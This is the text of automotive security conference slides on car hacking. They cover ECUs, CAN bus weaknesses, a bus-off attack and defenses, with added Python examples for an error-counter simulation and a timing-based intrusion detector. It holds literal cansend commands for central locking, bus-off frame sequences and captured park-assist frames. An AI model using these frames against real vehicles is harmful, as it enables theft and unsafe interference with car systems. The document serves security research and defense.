1
Car Hacking:
From Angelina Jolie to Charlize Theron
2
The old-school mechanics
3
The old-school mechanics
4
The old-school mechanics
5
Mercedes 300: The beginning
6
What is an ECU?
• An ECU is an embedded system that controls/monitors systems in a car.
• The combination of ECUs is known as the car's computer.
• The car's “computer” is not one system but a large number of small subsystems connected together by a network.
7
What is an ECU?
• More than 80 ECUs in a car.
• Each ECU (Electronic Control Unit) connected in the car represents a separate point of vulnerability to a cyber attack.
• If one ECU is compromised, it’s a gateway to every other ECU in the vehicle.
• Terabytes of data travel between vehicles, cloud networks, wearables and mobile devices, and they are obviously a desirable target for cybercriminals.
8
What is an ECU?
• The CAN bus is a 30-year-old architecture. CAN contains numerous vulnerabilities that are inherent in its design.
• Lack of segmentation and boundary defense.
• Lack of device authentication.
• Unencrypted traffic.
• Security by obscurity is not security at all.
9
Security… through obscurity
10
11
12
Evolution of the threats
Early hacks Recent hacks
13
Evolution of the threats
• Hackers can steal a Tesla Model S in seconds by cloning its key fob:
https://www.wired.com/story/hackers-steal-tesla-model-s-seconds-key-fob/
14
Evolution of the threats
• A Dutch first: Ingenious BMW theft attempt:
https://mrooding.me/a-dutch-first-ingenious-bmw-theft-attempt-5f7f49a96ec8
15
How is access gained?
16
Our lab
17
Our lab
18
Bus-off attack
• Fault tolerance
• 5 errors: Bit error, Stuff error, CRC error, Form error, ACK error
• Counters
– TEC: transmit error counter
– REC: receive error counter
• States and transitions
– error-active → error-passive: TEC > 127 | REC > 127
– error-passive → error-active: TEC < 128 & REC < 128
– error-passive → bus-off: TEC > 255
– bus-off → error-active: Reset | 128x11 recessive bits
19
Bus-off attack
[Figure: bit sequences on the bus]
20
Bus-off attack
• Attack conditions
– Same ID
– Same time
– Different data

0x107 8 0x08 0xA0 0xFE 0x04 0x80 0x00 0x00 0x04
0x107 8 0x08 0x80 0xFE 0x04 0x80 0x00 0x00 0x04

0 0 0 0 1 0 0 0 1 0 1 0 0 0 0 0 0
0 0 0 0 1 0 0 0 1 0 0 0 1 0 0 0 0 0 0
– Error raised: TEC1 + 8
– Error raised: TEC2 + 8
– TEC = 128

0 0 0 0 1 0 0 0 1 0 1
0 0 0 0 1 0 0 0 1 0 0 0 1 , , ,
– Error raised: TEC1 + 8
– TEC2 - 1
– TEC1 = 255
– Bus-off
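
The counter steps on the two slides above, replayed as a small model of the fault-confinement state machine (an added example, not part of the original deck). The function names, the `retransmit_ok` option and the explanation of why both counters rise in the first phase are assumptions of this example; the thresholds and the +8 / -1 steps are the ones on the slides.

```python
# Added example: CAN fault-confinement counters during the collision
# sequence on the slides. Node 1 / node 2 correspond to TEC1 / TEC2.
ERROR_ACTIVE, ERROR_PASSIVE, BUS_OFF = "error-active", "error-passive", "bus-off"


def state(tec, rec=0):
    """Fault-confinement state for given counters (thresholds from the slide)."""
    if tec > 255:
        return BUS_OFF
    if tec > 127 or rec > 127:
        return ERROR_PASSIVE
    return ERROR_ACTIVE


def simulate_collisions(retransmit_ok=False, max_rounds=100):
    """Replay repeated same-ID, same-time, different-data collisions.

    Returns [(round, tec1, tec2, state1, state2), ...], ending with the round
    in which node 1 goes bus-off (or after max_rounds).
    retransmit_ok=False: the slide's arithmetic only (+8 / -1).
    retransmit_ok=True: assumption, node 1's retransmission succeeds after
    each phase-2 error, so it also gets -1 (net +7 per round).
    """
    tec1 = tec2 = 0
    trace = []
    for rnd in range(1, max_rounds + 1):
        phase2 = state(tec1) != ERROR_ACTIVE
        tec1 += 8  # node 1 detects the bit error in every collision
        if phase2:
            # Node 1 is error-passive: its error flag is recessive, node 2's
            # frame completes and node 2 counts a successful transmission.
            tec2 = max(0, tec2 - 1)
        else:
            # Node 1 is error-active: its dominant error flag also destroys
            # node 2's frame, so node 2 counts a transmit error as well.
            tec2 += 8
        trace.append((rnd, tec1, tec2, state(tec1), state(tec2)))
        if state(tec1) == BUS_OFF:
            break
        if phase2 and retransmit_ok:
            tec1 -= 1
    return trace


def first_round_in(trace, wanted, node=1):
    """Round number at which the given node first reports state `wanted`."""
    idx = 3 if node == 1 else 4
    return next((row[0] for row in trace if row[idx] == wanted), None)


if __name__ == "__main__":
    for label, flag in (("slide arithmetic", False), ("with retransmission", True)):
        t = simulate_collisions(retransmit_ok=flag)
        print(label, "| error-passive at round", first_round_in(t, ERROR_PASSIVE),
              "| bus-off at round", first_round_in(t, BUS_OFF), "| final", t[-1])
```

On Linux SocketCAN, `ip -details link show can0` reports the local controller's state and its `berr-counter` tx/rx values, which is where these counters can be watched on a test bench.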
21
Bus-off attack
22
Bus-off attack (Bonus track)
23
Central locking
cansend can0 184#61A40A0009000200
cansend can0 366#0010001E80030000
cansend can0 184#2F51050118000200
cansend can0 366#0010001E80030000
24
Central locking
25
Park assistant
26
Park assistant
• Parking operation ~ 1 min
– 60,000 CAN messages
– 150 IDs

ID   Byte 0  Byte 1  Byte 2  Byte 3  Byte 4  Byte 5  Byte 6  Byte 7
130  EB      6A      16      00      06      00      04      80
130  8F      6B      16      00      06      00      04      80
130  9C      6C      16      00      06      00      04      80
130  CB      6D      15      00      06      00      04      80
130  01      6E      13      00      06      00      04      80
130  A2      6F      11      00      06      00      04      80
130  C5      61      0E      00      06      00      04      80
27
Park assistant
28
GPS spoofing
29
The future
30
The future
31
The future
32
How we can protect ourselves
33
It does not look like it will stop being used
http://eecatalog.com/automotive/2013/03/13/automotive-communication-protocols-preparing-for-the-future/
34
How we can protect ourselves
• IDPS: Real Time Detection and Neutralization
– CANBUS Packet Inspection
– Context Analysis
– Detects malicious CAN messages using ML algorithms
– Zero-day detection (based on behavior)
– Low delay to manage the HUGE amount of data
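
A minimal form of the behavior-based packet inspection listed above, as an added example that is not part of the original deck: it learns each ID's normal inter-arrival time from a known-good capture and flags frames that arrive too early or on unseen IDs. It is a plain timing baseline rather than the ML approach the slide mentions; the 100 ms / 200 ms cadences, timestamps and zero payloads are constructed, and only the two flagged payloads come from the central-locking slide.

```python
# Added example: timing-baseline check over candump -L style log lines.
import re
from statistics import median

LINE = re.compile(r"\((\d+\.\d+)\)\s+\S+\s+([0-9A-Fa-f]{3,8})#([0-9A-Fa-f]*)")


def parse(lines):
    """Yield (timestamp, can_id, data_hex) for each well-formed log line."""
    for line in lines:
        m = LINE.match(line.strip())
        if m:
            yield float(m.group(1)), m.group(2).upper(), m.group(3).upper()


def learn_periods(frames):
    """Median inter-arrival time per CAN ID from a known-good capture."""
    last, gaps = {}, {}
    for ts, cid, _ in frames:
        if cid in last:
            gaps.setdefault(cid, []).append(ts - last[cid])
        last[cid] = ts
    return {cid: median(g) for cid, g in gaps.items()}


def detect(frames, periods, ratio=0.5):
    """Flag IDs never seen in the baseline and frames that arrive early."""
    alerts, last = [], {}
    for ts, cid, data in frames:
        if cid not in periods:
            alerts.append((ts, cid, data, "unknown-id"))
            continue
        if cid in last and ts - last[cid] < ratio * periods[cid]:
            alerts.append((ts, cid, data, "too-early"))
            continue  # keep tracking the legitimate cadence
        last[cid] = ts
    return alerts


def constructed_capture(start, n, extra=()):
    """Constructed sample: 184 every 100 ms, 366 every 200 ms (assumed)."""
    rows = list(extra)
    for i in range(n):
        rows.append((start + i * 0.1, "184", "0000000000000000"))
        if i % 2 == 0:
            rows.append((start + i * 0.1 + 0.001, "366", "0000000000000000"))
    return [f"({ts:.6f}) can0 {cid}#{data}" for ts, cid, data in sorted(rows)]


def demo():
    baseline = constructed_capture(1520000000.0, 20)
    periods = learn_periods(parse(baseline))
    # Same traffic plus two frames with the payloads shown on the
    # central-locking slide, placed between the periodic ones.
    suspect = constructed_capture(1520000100.0, 20, extra=[
        (1520000100.42, "184", "61A40A0009000200"),
        (1520000100.43, "366", "0010001E80030000"),
    ])
    return detect(parse(suspect), periods)


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```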
35
Acknowledgements
• To XXXX: for voiding the car's warranty the first time we went in with a bricked ECU:
36
37
Thank you very much
Carlos Sahuquillo Pascual
Automotive CyberSecurity Consultant
@csahuqui on Twitter
https://sahuquillo.org
Igor Robles Puente
Automotive CyberSecurity Research Engineer

Carlos Sahuquillo - Car Hacking: de Angelina Jolie a Charlize Theron [rootedvlc2018]
